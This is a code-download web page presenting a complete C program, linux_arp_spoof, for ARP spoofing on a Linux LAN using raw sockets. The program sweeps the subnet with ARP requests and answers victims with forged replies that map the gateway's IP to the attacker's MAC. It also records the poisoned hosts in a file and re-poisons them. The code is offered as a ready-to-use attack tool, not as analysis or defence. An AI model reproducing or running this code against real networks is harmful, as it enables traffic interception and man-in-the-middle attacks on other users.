⭐ 欢迎来到虫虫下载站! | 📦 资源下载 📁 资源专辑 ℹ️ 关于我们
⭐ 虫虫下载站
📤 上传资源

📄 tcpip.txt

📁 用原始套接字LINUX下局域网ARP欺骗的代码
💻 TXT
字号:
🔍 
#include <stdio.h> 
#include <stdlib.h> 
#include <string.h> 
#include <sys/time.h> 
#include <unistd.h> 
#include <sys/socket.h> 
#include <linux/if_arp.h> 
#include <netdb.h> 
#include <errno.h> 
#include <linux/if_ether.h> 
#include <arpa/inet.h> 
#include <sys/ioctl.h> 
#include <netinet/in.h> 
#include <netinet/ip.h> 
#include <netinet/udp.h> 
#include <netinet/tcp.h> 
#include <pthread.h> 
#define ETH_INT "eth0" 
#define PROGRAME_NAME "linux_arp_spoof" 
#define PROGRAME_VERSION "1.0.1.19" 
#define MAKETIME "08/11/30 17:21" 
int sockfd; 
int send_arp_flag = 0; 
FILE *fp1,*fp2; 
struct sockaddr_ll _sockaddr; 
unsigned char my_ip[4]; 
unsigned char my_mac[6]; 
unsigned char gateway_ip[4]; 
unsigned char attack_ip[4]; 
unsigned char broadcast_mac[6] = {0xff, 0xff, 0xff, 0xff, 0xff, 0xff}; 
//frame header 14 bytes 
struct frame_hdr 
{ 
        unsigned char dst_mac[6]; 
        unsigned char src_mac[6]; 
        unsigned short frm_type; 
}; 
////all frame 14+8+20 bytes 
struct frame_ether 
{ 
        struct frame_hdr fh; 
        struct arphdr ah; 
        unsigned char src_mac[6]; 
        unsigned char src_ip[4]; 
        unsigned char dst_mac[6]; 
        unsigned char dst_ip[4]; 
}; 

void *send_one_arp() 
{ 
for(;;) 
{ 
  if(send_arp_flag == 1) 
  { 
   unsigned char d_ip[4]; 
   struct frame_ether frame; 
   memcpy(frame.fh.dst_mac,broadcast_mac,6); 
   memcpy(frame.fh.src_mac,my_mac,6); 
   frame.fh.frm_type = htons(ETH_P_ARP); 
   frame.ah.ar_hrd = htons(ARPHRD_ETHER); 
   frame.ah.ar_pro = htons(ETH_P_IP); 
   frame.ah.ar_hln = 6; 
   frame.ah.ar_pln = 4; 
   frame.ah.ar_op = htons(ARPOP_REQUEST); 
   memcpy(frame.src_mac,my_mac,6); 
   memcpy(frame.src_ip,my_ip,4); 
   memcpy(frame.dst_mac,broadcast_mac,6); 
   if(fp2=fopen("iplist","r")) 
   { 
    while(!feof(fp1)) 
    { 
//     printf("%d.%d.%d.%d\n",d_ip[0],d_ip[1],d_ip[2],d_ip[3]); 
     fscanf(fp1,"%d.%d.%d.%d\n",&d_ip[0],&d_ip[1],&d_ip[2],&d_ip[3]); 
     memcpy(frame.dst_ip,d_ip,4); 
     int arp_request = sendto(sockfd,&frame,sizeof(frame),0,(struct sockaddr*) 
&_sockaddr,sizeof(_sockaddr)); 
     if(arp_request > 0) 
     { 
      printf("-------------------------------------------------------------------- 
-----------\n"); 
      printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)",my_mac[0],my_mac 
[1],my_mac[2],my_mac[3],my_mac[4],my_mac[5],my_ip[0],my_ip[1],my_ip[2],my_ip[3]); 
      printf("\t ---request (broadcast)--->\t"); 
      printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)\n",broadcast_mac 
[0],broadcast_mac[1],broadcast_mac[2],broadcast_mac[3],broadcast_mac[4],broadcast_mac[5],d_ip[0],d_ip[1],d_ip[2],d_ip[3]); 
     } 
     else 
     { 
      perror("sendto"); 
     } 
    } 
   } 
   fclose(fp2); 
   send_arp_flag = 0; 
  } 
} 
} 
//send arp request to gateway 
void *send_arp() 
{ 
int i; 
struct frame_ether frame; 
memset(&frame,0,sizeof(frame)); 
/* set ether head */ 
memcpy(frame.fh.dst_mac,broadcast_mac,6); 
memcpy(frame.fh.src_mac,my_mac,6); 
frame.fh.frm_type = htons(ETH_P_ARP); 
/* define arp ether head */ 
frame.ah.ar_hrd = htons(ARPHRD_ETHER); 
frame.ah.ar_pro = htons(ETH_P_IP); 
frame.ah.ar_hln = 6; 
frame.ah.ar_pln = 4; 
frame.ah.ar_op = htons(ARPOP_REQUEST); 
memcpy(frame.src_mac,my_mac,6); 
memcpy(frame.src_ip,my_ip,4); 
memcpy(frame.dst_mac,broadcast_mac,6); 
/* send arp request broadcast */ 
for(;;) 
{ 
  for(i=1;i<255;i++) 
  { 
   if((i%10) == 0) 
    sleep(2); 
   if(i == gateway_ip[3] || i == my_ip[3]) 
   { 
    continue; 
   } 
   else 
   { 
    attack_ip[3] = i; 
    memcpy(frame.dst_ip,attack_ip,4); 
    int arp_request = sendto(sockfd, &frame, sizeof(frame), 0, (struct sockaddr*)&_sockaddr, 
sizeof(_sockaddr)); 
    printf("size of : %d\n",arp_request); 
    if(arp_request > 0) 
    { 
     printf("---------------------------------------------------------------------------- 
---\n"); 
     printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)",my_mac[0],my_mac[1],my_mac 
[2],my_mac[3],my_mac[4],my_mac[5],my_ip[0],my_ip[1],my_ip[2],my_ip[3]); 
     printf("\t ---request (broadcast)--->\t"); 
     printf("[%02x:%02x:%02x:%02x:%02x:%02x](%d.%d.%d.%d)\n",broadcast_mac 
[0],broadcast_mac[1],broadcast_mac[2],broadcast_mac[3],broadcast_mac[4],broadcast_mac[5],attack_ip[0],attack_ip[1],attack_ip 
[2],attack_ip[3]); 
    } 
    else 
    { 
     perror("sendto"); 
    } 
   } 
  } 
  sleep(3); 
} 
} 
// analyse arp reply and send fake arp reply packet 
void *get_arp_reply() 
{ 
int flag,i=0; 
unsigned char b_ip[4]; 
char buf[2048]; 
for(;;) 
{ 
  int n = recv(sockfd,buf,2048,0); 
  struct ethhdr *eth = (struct ethhdr *) buf; 
  if((ntohs(eth->h_proto)) == ETH_P_ARP) 
  { 
   printf("-------------------------------------------------------------------------------\n"); 
   struct frame_ether *old_frame = (struct frame_ether*)buf; 
   struct frame_ether frame; 
   memcpy(&frame,buf,sizeof(frame)); 
   int ar_op = ntohs(frame.ah.ar_op); 
   //----------------arp frame info--------------------------------------// 
   char ip_buf[100]; 
   inet_ntop(AF_INET, &old_frame->src_ip, ip_buf, 100); 
   printf("[%02x:%02x:%02x:%02x:%02x:%02x](%s)", old_frame->src_mac[0],old_frame->src_mac[1],old_frame- 
>src_mac[2],old_frame->src_mac[3],old_frame->src_mac[4],old_frame->src_mac[5], ip_buf); 
   printf("\t ---"); 
   if(ar_op == 2) 
    printf("reply--->\t"); 
   if(ar_op == 1) 
    printf("request--->\t"); 
   memset(ip_buf,0,100); 
   inet_ntop(AF_INET, &old_frame->dst_ip, ip_buf, 100); 
   printf("[%02x:%02x:%02x:%02x:%02x:%02x](%s)", old_frame->dst_mac[0],old_frame->dst_mac[1],old_frame- 
>dst_mac[2],old_frame->dst_mac[3],old_frame->dst_mac[4],old_frame->dst_mac[5], ip_buf); 
   printf("\n"); 
   //--------------------fake arp frame----------------------------// 
   if(ar_op == ARPOP_REPLY && (old_frame->dst_ip)[3] == my_ip[3] && (old_frame->src_ip)[3] != 
gateway_ip[3]) 
   {//judge the packet is normal arp reply from attack ip// 
    //bulid faked arp reply frame 
    memcpy(frame.fh.dst_mac,old_frame->fh.src_mac,6); 
    memcpy(frame.fh.src_mac,my_mac,6); 
    frame.ah.ar_op = htons(ARPOP_REPLY); 
    memcpy(frame.dst_mac,old_frame->fh.src_mac,6); 
    memcpy(frame.dst_ip,old_frame->src_ip,4); 
    memcpy(frame.src_mac,my_mac,6); 
    memcpy(frame.src_ip,gateway_ip,4); 
    //send faked arp reply frame 
    int arp_reply = sendto(sockfd,&frame,sizeof(frame),0,(struct sockaddr*)&_sockaddr,sizeof 
(_sockaddr)); 
    if(arp_reply > 0) 
    { 
     flag = 0; 
     printf("send faked arp reply to %d.%d.%d.%d \n",(old_frame->src_ip)[0],(old_frame- 
>src_ip)[1],(old_frame->src_ip)[2],(old_frame->src_ip)[3]); 
     if(fp1=fopen("iplist","ar+")) 
     { 
      while(!feof(fp1)) 
      { 
       fscanf(fp1,"%d.%d.%d.%d\n",&b_ip[0],&b_ip[1],&b_ip[2],&b_ip[3]); 
       if(b_ip[3] == (old_frame->src_ip)[3]) 
       { 
        flag = 1; 
        break; 
       } 
      } 
      if(flag == 0) 
      { 
       fprintf(fp1,"%d.%d.%d.%d\n",(old_frame->src_ip)[0],(old_frame- 
>src_ip)[1],(old_frame->src_ip)[2],(old_frame->src_ip)[3]); 
      } 
     } 
     fclose(fp1); 
    } 
    else 
    { 
     perror("sendto"); 
    } 
   } 
   if(ar_op == ARPOP_REQUEST && (old_frame->src_ip)[3] == gateway_ip[3] || ar_op == ARPOP_REQUEST && 
(old_frame->dst_ip)[3] == gateway_ip[3]/* || ar_op == ARPOP_REPLY && (old_frame->src_ip)[3] == gateway_ip[3]*/) 
   { 
    send_arp_flag = 1; 
   } 
  } 
} 
} 
int main(int argc, char **argv) 
{ 
unsigned char *attack; 
if(argc == 2) 
{ 
  if((strcmp(argv[1],"-v"))==0||(strcmp(argv[1],"-V"))==0) 
  { 
   printf("%s version %s\n", PROGRAME_NAME,PROGRAME_VERSION); 
   printf("last make date : %s\n",MAKETIME); 
   exit(1); 
  } 
  if((strcmp(argv[1],"-h"))==0||(strcmp(argv[1],"-H"))==0) 
  { 
   printf("usage : ./linux_arp_spoof [gatewayip]\n"); 
   exit(1); 
  } 
  if((long)inet_addr(argv[1]) < 0) 
  { 
   printf("parameter error : IP error. \n"); 
   exit(1); 
  } 
} 
else 
{ 
  printf("parameter error,please check -h \n"); 
  exit(-1); 
} 
int i; 
unsigned char *cp_ip; 
unsigned int src_ip[4]; 
struct sockaddr_in sin; 
struct ifreq ifr; 
if((sockfd=socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ARP)))<0) 
{ 
  perror("socket"); 
  exit(0); 
} 
memset(&_sockaddr,0,sizeof(_sockaddr)); 
memset(&ifr,0,sizeof(&ifr)); 
// which interface in work mode 
strcpy(ifr.ifr_name,ETH_INT); 
if(ioctl(sockfd,SIOCGIFINDEX,&ifr) != 0) 
{ 
  perror("ioctl"); 
  close(sockfd); 
  exit(1); 
} 
//get local mac 
if(ioctl(sockfd,SIOCGIFHWADDR,&ifr) < 0) 
{ 
  perror("ioctl"); 
  close(sockfd); 
  exit(2); 
} 
// my_mac = ifr.ifr_hwaddr.sa_data; 
for(i=0;i<6;i++) 
{ 
  my_mac[i] = (unsigned char)ifr.ifr_hwaddr.sa_data[i]; 
} 
//get local ip 
if(ioctl(sockfd,SIOCGIFADDR,&ifr) < 0) 
{ 
  perror("ioctl"); 
  close(sockfd); 
  exit(0); 
} 
memcpy(&sin, &ifr.ifr_addr, sizeof(sin)); 
// printf("%s \n",inet_ntoa(sin.sin_addr)); 
// 初始化参数,得到网关和网段 
cp_ip = (unsigned char *)inet_ntoa(sin.sin_addr); 
sscanf(cp_ip,"%d.%d.%d.%d",&src_ip[0],&src_ip[1],&src_ip[2],&src_ip[3]); 
for(i=0;i<4;i++) 
{ 
  my_ip[i] = src_ip[i]; 
} 
cp_ip = argv[1]; 
sscanf(cp_ip,"%d.%d.%d.%d",&src_ip[0],&src_ip[1],&src_ip[2],&src_ip[3]); 
for(i=0;i<4;i++) 
{ 
  gateway_ip[i] = src_ip[i]; 
  attack_ip[i] = src_ip[i]; 
} 
_sockaddr.sll_ifindex = ifr.ifr_ifindex; 
_sockaddr.sll_protocol = htons(ETH_P_ARP); 
// 创建多线程 
remove("iplist"); 
pthread_t id[3]; 
memset(&id,0,sizeof(id)); 
if(pthread_create(&id[0],NULL,send_arp,NULL) !=0) 
{ 
  printf("create pthread1 error\n"); 
  exit(1); 
} 
if(pthread_create(&id[1],NULL,get_arp_reply,NULL) !=0) 
{ 
  printf("create pthread2 error\n"); 
  exit(1); 
} 
if(pthread_create(&id[2],NULL,send_one_arp,NULL) !=0) 
{ 
  printf("create pthread3 error\n"); 
  exit(1); 
} 
pthread_join(id[0],NULL); 
pthread_join(id[1],NULL); 
pthread_join(id[2],NULL); 
}

⌨️ 快捷键说明

复制代码 Ctrl + C
搜索代码 Ctrl + F
全屏模式 F11
切换主题 Ctrl + Shift + D
显示快捷键 ?
增大字号 Ctrl + =
减小字号 Ctrl + -